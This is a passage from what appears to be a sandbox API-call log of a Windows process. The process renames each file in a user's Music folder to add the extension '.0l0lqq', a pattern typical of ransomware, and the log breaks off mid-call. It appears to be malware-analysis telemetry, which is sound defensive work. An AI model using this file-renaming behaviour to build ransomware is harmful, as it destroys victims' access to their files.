[0255.016] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0255.016] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0255.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0255.017] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0255.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0255.017] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0255.017] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0255.018] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3oLXxg5YVBLPn Li.mp3", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3oLXxg5YVBLPn Li.mp3", lpFilePart=0x0) returned 0x38 [0255.018] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc78) returned 1 [0255.018] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc74) returned 1 [0255.029] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3oLXxg5YVBLPn Li.mp3", nBufferLength=0x105, lpBuffer=0x26d76c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3oLXxg5YVBLPn Li.mp3", lpFilePart=0x0) returned 0x38 [0255.029] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc60) returned 1 [0255.031] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc5c) returned 1 [0255.033] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd04) returned 1 [0255.033] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd00) returned 1 [0255.033] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3oLXxg5YVBLPn Li.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3olxxg5yvblpn li.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3oLXxg5YVBLPn Li.mp3.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3olxxg5yvblpn li.mp3.0l0lqq")) returned 1 [0255.037] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4QwfbRhVUa_.m4a", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4QwfbRhVUa_.m4a", lpFilePart=0x0) returned 0x33 [0255.037] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0255.037] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0255.037] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0255.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0255.038] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0255.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0255.038] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0255.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0255.038] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0255.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0255.038] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0255.038] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0255.039] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4QwfbRhVUa_.m4a", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4QwfbRhVUa_.m4a", lpFilePart=0x0) returned 0x33 [0255.039] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc78) returned 1 [0255.039] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc74) returned 1 [0255.040] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc60) returned 1 [0255.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc5c) returned 1 [0255.045] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd04) returned 1 [0255.045] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd00) returned 1 [0255.045] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4QwfbRhVUa_.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4qwfbrhvua_.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\4QwfbRhVUa_.m4a.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\4qwfbrhvua_.m4a.0l0lqq")) returned 1 [0255.049] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\bvC6V9ciRknw01.m4a", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\bvC6V9ciRknw01.m4a", lpFilePart=0x0) returned 0x36 [0255.050] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0255.050] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0255.050] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0255.050] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0255.050] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0255.050] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0255.050] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0255.050] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0255.050] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0255.050] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0255.050] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0255.050] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0255.051] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\bvC6V9ciRknw01.m4a", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\bvC6V9ciRknw01.m4a", lpFilePart=0x0) returned 0x36 [0255.051] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc78) returned 1 [0255.051] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc74) returned 1 [0255.054] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc60) returned 1 [0255.055] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc5c) returned 1 [0255.057] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd04) returned 1 [0255.057] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd00) returned 1 [0255.057] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\bvC6V9ciRknw01.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\bvc6v9cirknw01.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\bvC6V9ciRknw01.m4a.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\bvc6v9cirknw01.m4a.0l0lqq")) returned 1 [0255.064] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\bzYT.wav", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\bzYT.wav", lpFilePart=0x0) returned 0x2c [0255.064] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0255.064] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0255.064] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0255.064] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0255.064] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0255.065] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0255.065] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0255.065] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0255.065] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0255.065] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0255.065] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0255.065] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0255.066] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\bzYT.wav", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\bzYT.wav", lpFilePart=0x0) returned 0x2c [0255.066] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc78) returned 1 [0255.066] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc74) returned 1 [0255.069] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc60) returned 1 [0255.070] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc5c) returned 1 [0255.071] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd04) returned 1 [0255.071] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd00) returned 1 [0255.071] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\bzYT.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\bzyt.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\bzYT.wav.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\bzyt.wav.0l0lqq")) returned 1 [0255.076] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\C Hqa.m4a", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\C Hqa.m4a", lpFilePart=0x0) returned 0x2d [0255.076] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0255.076] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0255.076] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0255.076] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0255.076] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0255.076] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0255.076] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0255.076] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0255.076] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0255.077] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0255.077] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0255.077] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0255.077] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\C Hqa.m4a", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\C Hqa.m4a", lpFilePart=0x0) returned 0x2d [0255.078] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc78) returned 1 [0255.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc74) returned 1 [0255.080] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc60) returned 1 [0255.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc5c) returned 1 [0255.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd04) returned 1 [0255.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd00) returned 1 [0255.082] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\C Hqa.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\c hqa.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\C Hqa.m4a.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\c hqa.m4a.0l0lqq")) returned 1 [0255.087] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ceXLBF8czRszEr5.wav", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ceXLBF8czRszEr5.wav", lpFilePart=0x0) returned 0x37 [0255.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0255.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0255.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0255.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0255.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0255.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0255.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0255.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0255.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0255.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0255.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0255.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0255.090] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ceXLBF8czRszEr5.wav", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ceXLBF8czRszEr5.wav", lpFilePart=0x0) returned 0x37 [0255.090] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc78) returned 1 [0255.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc74) returned 1 [0255.095] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc60) returned 1 [0255.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc5c) returned 1 [0255.099] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd04) returned 1 [0255.099] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd00) returned 1 [0255.099] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ceXLBF8czRszEr5.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\cexlbf8czrszer5.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ceXLBF8czRszEr5.wav.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\cexlbf8czrszer5.wav.0l0lqq")) returned 1 [0255.104] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CTScNZQ V.wav", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CTScNZQ V.wav", lpFilePart=0x0) returned 0x31 [0255.105] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0255.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0255.105] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0255.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0255.105] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0255.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0255.105] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0255.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0255.105] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0255.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0255.105] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0255.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0255.107] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CTScNZQ V.wav", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CTScNZQ V.wav", lpFilePart=0x0) returned 0x31 [0255.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc78) returned 1 [0255.107] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc74) returned 1 [0255.112] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc60) returned 1 [0255.113] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc5c) returned 1 [0255.115] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd04) returned 1 [0255.115] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd00) returned 1 [0255.115] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CTScNZQ V.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ctscnzq v.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CTScNZQ V.wav.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ctscnzq v.wav.0l0lqq")) returned 1 [0255.120] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CwKk0mO1iXxCgRd3.wav", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CwKk0mO1iXxCgRd3.wav", lpFilePart=0x0) returned 0x38 [0255.120] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0255.120] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0255.120] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0255.120] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0255.120] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0255.120] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0255.120] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0255.120] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0255.120] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0255.120] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0255.120] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0255.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0255.121] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CwKk0mO1iXxCgRd3.wav", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CwKk0mO1iXxCgRd3.wav", lpFilePart=0x0) returned 0x38 [0255.121] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc78) returned 1 [0255.121] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc74) returned 1 [0255.125] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc60) returned 1 [0255.127] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc5c) returned 1 [0255.128] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd04) returned 1 [0255.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd00) returned 1 [0255.128] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CwKk0mO1iXxCgRd3.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\cwkk0mo1ixxcgrd3.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CwKk0mO1iXxCgRd3.wav.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\cwkk0mo1ixxcgrd3.wav.0l0lqq")) returned 1 [0255.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0255.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0255.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0255.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0255.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0255.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0255.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0255.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0255.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0255.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0255.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0255.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0255.133] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D _JoKaSTWq.wav", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D _JoKaSTWq.wav", lpFilePart=0x0) returned 0x33 [0255.133] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc78) returned 1 [0255.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc74) returned 1 [0255.136] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc60) returned 1 [0255.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc5c) returned 1 [0255.139] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd04) returned 1 [0255.139] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd00) returned 1 [0255.139] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D _JoKaSTWq.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d _jokastwq.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\D _JoKaSTWq.wav.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\d _jokastwq.wav.0l0lqq")) returned 1 [0255.143] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0255.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0255.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0255.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0255.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0255.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0255.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0255.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0255.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0255.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0255.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0255.144] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0255.145] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\dMFh PkR1ioJzNm7 N9p.m4a", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\dMFh PkR1ioJzNm7 N9p.m4a", lpFilePart=0x0) returned 0x3c [0255.145] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc78) returned 1 [0255.145] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc74) returned 1 [0255.149] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dc60) returned 1 [0255.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dc5c) returned 1 [0255.154] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd04) returned 1 [0255.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd00) returned 1 [0255.154] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\dMFh PkR1ioJzNm7 N9p.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dmfh pkr1iojznm7 n9p.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\dMFh PkR1ioJzNm7 N9p.m4a.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\dmfh pkr1iojznm7 n9p.m4a.0l0lqq")) returned 1 [0255.158] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0255.158] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0255.159] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e310) returned 1 [0255.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e30c) returned 1 [0255.159] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0255.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2c0) returned 1 [0255.159] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd40) returned 1 [0255.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd3c) returned 1 [0255.159] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0255.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd9c) returned 1 [0255.159] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dda0) returned 1 [0255.160] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eNJjT.m4a", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eNJjT.m4a", lpFilePart=0x0) returned 0x2d [0255.168] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eNJjT.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\enjjt.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eNJjT.m4a.0l0lqq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\enjjt.m4a.0l0lqq")) returned 1 [0255.172] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fl7Fzrs.wav", nBufferLength=0x105, 